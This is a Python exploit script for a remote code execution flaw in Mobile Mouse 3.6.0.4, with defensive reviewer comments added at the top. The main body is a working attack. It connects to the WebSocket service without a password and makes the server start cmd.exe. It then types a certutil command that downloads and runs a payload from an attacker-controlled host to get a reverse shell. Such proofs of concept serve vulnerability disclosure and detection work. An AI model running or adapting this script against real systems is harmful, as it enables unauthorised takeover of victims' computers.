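#!/usr/bin/env python3
# Exploit Title: Mobile Mouse 3.6.0.4 WebSocket Remote code execution
# Date: 06/17/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://mobilemouse.com/
# Software Link: https://www.mobilemouse.com/downloads/setup.exe
# Version: 3.6.0.4
# Tested on: Windows 10 (Build 19044)
'''
Mobile Mouse 3.6.0.4 contains a critical remote code execution
vulnerability through its WebSocket interface.
'''

# Reviewer notes (defensive context, derived only from what this script does):
# - Exposure: the Mobile Mouse server is reached over plain ws:// on TCP
#   35913 (the default port, per the comment below). Limit that port with
#   the host firewall to the devices that need it, or remove the software
#   where it is not used.
# - Authentication: the script sends an empty password and stops when the
#   server answers "Please enter a password", so a server with a password
#   set is not reachable through this unauthenticated path as written.
#   Whether a password fully closes the issue is not shown here.
# - Detection: cmd.exe started through the Mobile Mouse server, certutil.exe
#   run with "-urlcache -split -f" against an HTTP URL, and a new executable
#   written to and started from C:\Windows\Temp are the observable artefacts
#   of the sequence below. Unexpected inbound connections to TCP 35913 are
#   the network-side signal.

import asyncio
import websockets
import uuid
from time import sleep  # unused now that the delay is awaited; kept so the import set is unchanged
import sys

# Lab addresses from the original proof of concept (private address space).
target_ip = "192.168.8.105"
port = 35913  # default port
uri = f"ws://{target_ip}:{port}"

# Host and file name the target is told to download from over HTTP.
lhost = "192.168.8.100"
payload = "shell.exe"

# Protocol framing: fields are separated by ASCII RS (0x1e) and each message
# ends with ASCII EOT (0x04).
EOR_CHAR = '\x1e'
EOF_CHAR = '\x04'


async def exploit():
    """Run the proof-of-concept sequence against ``uri``.

    Steps, in order:
      1. Open a WebSocket and send a CONNECT message with an empty password.
      2. Read the reply: continue on "Welcome", exit with status 0 when the
         server asks for a password, exit with status 1 when no reply
         arrives within 5 seconds (or the receive fails).
      3. Ask the server to run cmd.exe, send the download-and-run command
         line as keystrokes, then send ENTER.

    Returns nothing; progress is printed to stdout.
    """
    async with websockets.connect(uri) as ws:
        print("[+] WebSocket connected")

        field1 = ""  # password if known
        field2_guid = str(uuid.uuid4()).upper()  # fresh random client identifier
        field3_device_type = "Desktop"
        field4_version1 = "2"
        field5_version2 = "2"
        # 32 zero bytes in the server's textual "{length=..,bytes=0x..}" form;
        # presumably a key field, judging by the variable name only.
        field6_version3_key = "{length=32,bytes=0x" + "00" * 32 + "}"

        connect_message = (
            f"CONNECT{EOR_CHAR}"
            f"{field1}{EOR_CHAR}"
            f"{field2_guid}{EOR_CHAR}"
            f"{field3_device_type}{EOR_CHAR}"
            f"{field4_version1}{EOR_CHAR}"
            f"{field5_version2}{EOR_CHAR}"
            f"{field6_version3_key}{EOF_CHAR}"
        )

        await ws.send(connect_message)
        print("[>] Connecting ...")

        try:
            response = await asyncio.wait_for(ws.recv(), timeout=5)
            # Frames may arrive as bytes or str; normalise to str.
            decoded = response.decode("utf-8", errors="ignore") if isinstance(response, bytes) else response
            decoded = decoded.strip()
            if "Welcome" in decoded:
                print("[+] CONNECT accepted by server.")
            elif "Please enter a password" in decoded:
                # A password-protected server rejects the empty password.
                print("[!] Server requires a password. Aborting.")
                sys.exit(0)
            else:
                # NOTE: the script carries on after an unrecognised reply.
                print(f"[!] Unexpected response: {repr(decoded)}")
        except Exception as e:
            # sys.exit() above raises SystemExit, which is not an Exception
            # subclass, so it is not swallowed here.
            print(f"[!] No response after CONNECT: {e}")
            sys.exit(1)

        await asyncio.sleep(3)

        # Program-launch action: the server is asked to start cmd.exe.
        cmd = "SENDPROGRAMACTION\x1eRUN\x1ecmd.exe\x04"
        await ws.send(cmd)
        # Awaited instead of time.sleep() so the event loop (and the
        # WebSocket connection it services) is not blocked during the wait.
        await asyncio.sleep(3)

        # KEY message carrying the command line as text; the meaning of the
        # numeric code 116 is not shown on this page.
        command_payload = f"KEY\x1e116\x1ecertutil -urlcache -split -f http://{lhost}/{payload} C:\\Windows\\Temp\\payload.exe & C:\\Windows\\Temp\\payload.exe\x1e\x04"
        await ws.send(command_payload)
        print("[+] reverse shell payload sent")

        # KEY message sending ENTER to submit the typed command line.
        execute = "KEY\x1e-1\x1eENTER\x1e\x04"
        await ws.send(execute)
        print("[+] Payload executed, check your listener!")


# Guarded so that importing this file does not open a connection.
if __name__ == "__main__":
    asyncio.run(exploit())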